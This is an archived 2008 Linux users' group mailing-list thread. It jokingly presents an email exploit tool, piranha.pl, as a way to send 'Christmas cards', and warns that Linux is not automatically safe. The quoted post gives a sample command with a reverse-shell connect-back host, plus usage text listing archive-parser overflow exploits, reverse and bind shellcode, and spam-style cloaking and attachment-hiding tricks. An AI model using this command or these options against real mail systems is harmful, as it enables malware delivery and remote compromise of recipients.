HackFest Series: Email Christmas Cheer

Lisa Kachold lisakachold at obnosis.com
Thu Dec 25 13:35:56 MST 2008 

cryptworks said:


> Date: Thu, 25 Dec 2008 13:03:10 -0700
> From: cryptworks at gmail.com
> To: plug-discuss at lists.plug.phoenix.az.us
> Subject: Re: HackFest Series: Email Christmas Cheer
> 
> That's twisted but funny

It's my job to educate ALL as we happily anesthetize each other (and Noob Linux Penguins) with how safe (and virus free) NIX is; someone must be the voice that reminds all that Linux is a powerful tool, to be wielded carefully and TRUST is the basis of ALL SECURITY.

But you can trust me....really!

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux/Vista-XP/OS X BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant.

> On 12/25/08, Lisa Kachold <lisakachold at obnosis.com> wrote:
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > Send some Christmas cards:
> >
> > $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
> > myname at mydomain.com
> >
> >
> > Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
> >
> > Mandatory arguments:
> >   -e+           Exploit number to use (See below)
> >   -h+           SMTP server to test
> >   -a+           Destination email address used in probing
> >
> > Optional arguments:
> >   -s+          Shellcode type to inject into exploits (See below)
> >   -c+          Cloaking style (See below)
> >   -d+          Try to vanish attachments from MUA's view (See below)
> >   -v            Attach EICAR virus to improve stealthness
> >   -z            Pack all the malware into a tarball to be less noisy
> >   -p+          Port to use in reverse shell or bind shell
> >   -l+           Host to connect back in reverse shell mode
> >
> > Valid exploits numbers:
> >    0            OSVDB #5753:    LHA get_header File Name Overflow
> >    1            OSVDB #5754:    LHA get_header Directory Name Overflow
> >    2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
> >    3            OSVDB #11695:   unarj Filename Handling Overflow
> >    4            OSVDB #23460:   ZOO combine File and Dir name overflow
> >    5            OSVDB #15867:   Convert UUlib uunconc integer overflow
> >    6            OSVDB #XXX:     ZOO next offset infinite loop DoS
> >
> > Valid shellcode types:
> >    0            TCP reverse shell
> >    1            UDP reverse shell
> >    2            TCP bind shell
> >
> > Valid cloaking styles (consult whitepaper for visual result):
> >    0            No cloaking at all (default)
> >    1            Viagra spam message
> >    2            "Look at the pictures I promised you!"
> >
> > Vanishing techniques for attachments:
> >    0            No vanishing at all (default)
> >    1            Multipart/alternative trick
> >    2            <img src="image.JPG" width=0 height=0> trick
> >
> > www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
> > hackfest.obnosis.com (503)754-4452
> > January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
> > Forensics @ UAT 1/10/09 12-3PM
> > Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or
> > take the Blue [XP/Vista Update] Pill & stay happily ignorant.
> >
> > http://uncyclopedia.wikia.com/wiki/Satan_Claus
> > _________________________________________________________________
> > Send e-mail anywhere. No map, no compass.
> > http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008
> 
> -- 
> Sent from my mobile device
> 
> A mouse trap, placed on top of your alarm clock, will prevent you from
> rolling over and going back to sleep after you hit the snooze button.
> 
> Stephen
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

_________________________________________________________________
It’s the same Hotmail®. If by “same” you mean up to 70% faster.
http://windowslive.com/online/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_broad1_122008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081225/36c16891/attachment.htm

More information about the PLUG-discuss mailing list